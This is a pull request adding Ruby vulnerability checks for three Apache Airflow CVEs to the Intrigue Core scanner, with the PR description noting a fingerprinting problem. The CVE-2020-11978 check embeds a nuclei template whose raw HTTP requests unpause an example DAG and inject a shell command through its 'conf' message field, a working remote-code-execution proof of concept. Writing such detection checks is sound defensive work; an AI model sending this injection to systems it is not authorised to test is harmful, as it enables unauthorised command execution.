### PR TITLE
Adding Apache Airflow vulnerability checks

### DIFF
--- a/lib/checks/apache_airflow_cve_2020_11978.rb
+++ b/lib/checks/apache_airflow_cve_2020_11978.rb
@@ -1,0 +1,117 @@
+module Intrigue
+  module Issue
+    class ApacheAirflowCve202011978 < BaseIssue
+      def self.generate(instance_details = {})
+        {
+          added: "2021-06-30",
+          name: "apache_airflow_cve_2020_11978",
+          pretty_name: "Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution (CVE-2020-11978)",
+          severity: 1,
+          category: "vulnerability",
+          status: "confirmed",
+          description: "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.",
+          identifiers: [
+            { type: "CVE", name: "CVE-2020-11978" }
+          ],
+          affected_software: [
+            { vendor: "Apache", product: "Airflow" }
+          ],
+          references: [
+            { type: "description", uri: "https://nvd.nist.gov/vuln/detail/CVE-2020-11978" },
+            { type: "description", uri: "https://twitter.com/wugeej/status/1400336603604668418" },
+            { type: "exploit", uri: "https://github.com/pberba/CVE-2020-11978" }
+          ],
+          authors: ["pdteam", "adambakalar"]
+        }.merge!(instance_details)
+      end
+    end
+  end
+
+  module Task
+    class ApacheAirflowCve202011978 < BaseCheck
+      def self.check_metadata
+        {
+          allowed_types: ["Uri"]
+        }
+      end
+
+      # return truthy value to create an issue
+      def check
+          # run a nuclei
+          uri = _get_entity_name
+          template = <<-HEREDOC
+          id: CVE-2020-11978
+          info:
+            name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
+            author: pdteam
+            severity: high
+            description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
+            reference: |
+                  - https://github.com/pberba/CVE-2020-11978
+                  - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+                  - https://twitter.com/wugeej/status/1400336603604668418
+            tags: cve,cve2020,apache,airflow,rce
+          
+          requests:
+            - raw:
+                - |
+                  GET /api/experimental/test HTTP/1.1
+                  Host: {{Hostname}}
+                  Connection: close
+                  Accept-Encoding: gzip, deflate
+                  Accept: */*
+          
+                - |
+                  GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
+                  Host: {{Hostname}}
+                  Connection: close
+                  Accept-Encoding: gzip, deflate
+                  Accept: */*
+          
+                - |
+                  POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
+                  Host: {{Hostname}}
+                  Connection: close
+                  Accept-Encoding: gzip, deflate
+                  Accept: */*
+                  Content-Length: 85
+                  Content-Type: application/json
+          
+                  {"conf": {"message": "\"; touch test #"}}
+          
+                - |
+                  GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
+                  Host: {{Hostname}}
+                  Connection: close
+                  Accept-Encoding: gzip, deflate
+                  Accept: */*
+          
+          
+              extractors:
+                - type: regex
+                  name: exec_date
+                  part: body
+                  group: 1
+                  internal: true
+                  regex:
+                    - '"execution_date":"([0-9-A-Z:+]+)"'
+          
+              matchers-condition: and
+              matchers:
+                - type: word
+                  words:
+                    - 'application/json'
+                  part: header
+                - type: word
+                  words:
+                    - '"operator":"BashOperator"'
+                  part: body
+          HEREDOC
+  
+          # if this returns truthy value, an issue will be raised
+          # the truthy value will be added as proof to the issue
+          run_nuclei_template_from_string uri, template
+      end
+    end
+  end
+end

--- a/lib/checks/apache_airflow_cve_2020_11978.rb
+++ b/lib/checks/apache_airflow_cve_2020_11978.rb
@@ -55,20 +55,6 @@ module Intrigue
           requests:
             - raw:
                 - |
-                  GET /api/experimental/test HTTP/1.1
-                  Host: {{Hostname}}
-                  Connection: close
-                  Accept-Encoding: gzip, deflate
-                  Accept: */*
-          
-                - |
-                  GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
-                  Host: {{Hostname}}
-                  Connection: close
-                  Accept-Encoding: gzip, deflate
-                  Accept: */*
-          
-                - |
                   POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
                   Host: {{Hostname}}
                   Connection: close

--- a/lib/checks/apache_airflow_cve_2020_13927.rb
+++ b/lib/checks/apache_airflow_cve_2020_13927.rb
@@ -5,7 +5,7 @@ module Intrigue
         {
           added: "2021-06-30",
           name: "apache_airflow_cve_2020_13927",
-          pretty_name: "Unauthenticated Airflow Experimental REST API (CVE-2020-13927)",
+          pretty_name: "Apache Airflow Unauthenticated Access to Experimental REST API (CVE-2020-13927)",
           severity: 1,
           category: "vulnerability",
           status: "confirmed",

--- a/lib/checks/apache_airflow_cve_2020_13927.rb
+++ b/lib/checks/apache_airflow_cve_2020_13927.rb
@@ -1,0 +1,48 @@
+module Intrigue
+  module Issue
+    class ApacheAirflowCve202013927 < BaseIssue
+      def self.generate(instance_details = {})
+        {
+          added: "2021-06-30",
+          name: "apache_airflow_cve_2020_13927",
+          pretty_name: "Unauthenticated Airflow Experimental REST API (CVE-2020-13927)",
+          severity: 1,
+          category: "vulnerability",
+          status: "confirmed",
+          description: "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact.",
+          identifiers: [
+            { type: "CVE", name: "CVE-2020-13927" }
+          ],
+          affected_software: [
+            { vendor: "Apache", product: "Airflow" }
+          ],
+          references: [
+            { type: "description", uri: "https://nvd.nist.gov/vuln/detail/CVE-2020-13927" }
+          ],
+          authors: ["pdteam", "adambakalar"]
+        }.merge!(instance_details)
+      end
+    end
+  end
+
+  module Task
+    class ApacheAirflowCve202013927 < BaseCheck
+      def self.check_metadata
+        {
+          allowed_types: ["Uri"]
+        }
+      end
+
+      # return truthy value to create an issue
+      def check
+        # run a nuclei
+        uri = _get_entity_name
+        template = "cves/2020/CVE-2020-13927"
+
+        # if this returns truthy value, an issue will be raised
+        # the truthy value will be added as proof to the issue
+        run_nuclei_template uri, template
+      end
+    end
+  end
+end

--- a/lib/checks/apache_airflow_cve_2020_17526.rb
+++ b/lib/checks/apache_airflow_cve_2020_17526.rb
@@ -11,7 +11,7 @@ module Intrigue
           ],
           severity: 2,
           category: "vulnerability",
-          status: "confirmed",
+          status: "potential",
           description: "Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.",
           affected_software: [
             { vendor: "Apache", product: "Airflow" }
@@ -30,7 +30,7 @@ module Intrigue
     class ApacheAirflowCve202017526 < BaseCheck
       def self.check_metadata
         {
-          allowed_types: ["NetworkService"]
+          allowed_types: ["Uri"]
         }
       end
 
@@ -38,10 +38,13 @@ module Intrigue
 
       def check
 
+        # first, ensure we're fingerprinted
+        require_enrichment
+
         # get version for product
         version = get_version_for_vendor_product(@entity, "Apache", "Airflow")
         return false unless version
-
+       
         # compare the version we got to the vulnerable version
         is_vulnerable = compare_versions_by_operator(version, "1.10.14" , "<")
 

--- a/lib/checks/apache_airflow_cve_2020_17526.rb
+++ b/lib/checks/apache_airflow_cve_2020_17526.rb
@@ -1,0 +1,52 @@
+module Intrigue
+  module Issue
+    class ApacheAirflowCve202017526 < BaseIssue
+      def self.generate(instance_details = {})
+        {
+          added: "2021-06-30",
+          name: "apache_airflow_cve_2020_17526",
+          pretty_name: "Apache Airflow Webserver < 1.10.14 - Incorrect Session Validation (CVE-2020-17526)",
+          identifiers: [
+            { type: "CVE", name: "CVE-2020-17526" }
+          ],
+          severity: 2,
+          category: "vulnerability",
+          status: "confirmed",
+          description: "Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.",
+          affected_software: [
+            { vendor: "Apache", product: "Airflow" }
+          ],
+          references: [
+            { type: "description", uri: "https://nvd.nist.gov/vuln/detail/CVE-2020-17526" },
+            { type: "description", uri: "https://ian.sh/airflow" }
+          ],
+          authors: ["adambakalar", "iangcarroll"]
+        }.merge!(instance_details)
+      end
+    end
+  end
+
+  module Task
+    class ApacheAirflowCve202017526 < BaseCheck
+      def self.check_metadata
+        {
+          allowed_types: ["NetworkService"]
+        }
+      end
+
+      # return truthy value to create an issue
+
+      def check
+
+        # get version for product
+        version = get_version_for_vendor_product(@entity, "Apache", "Airflow")
+        return false unless version
+
+        # compare the version we got to the vulnerable version
+        is_vulnerable = compare_versions_by_operator(version, "1.10.14" , "<")
+
+        return is_vulnerable
+      end
+    end
+  end
+end


### PR DESCRIPTION
Adding vulnerability checks for the following Apache Airflow CVEs:

- `CVE-2020-11978`
- `CVE-2020-13927`
- `CVE-2020-17526`

Jira ticket for more details: https://intriguesecurity.atlassian.net/browse/COR-104

One note:

When working on the vulnerability task for `CVE-2020-17526` I tried making it work with both the `NetworkService` and `Uri` entity types, but when testing with the `Uri` type Core was never able to properly grab the `fingerprint` detail, even though when I looked up the entity itself the fingerprints were there, including the Apache Airflow fingerprint.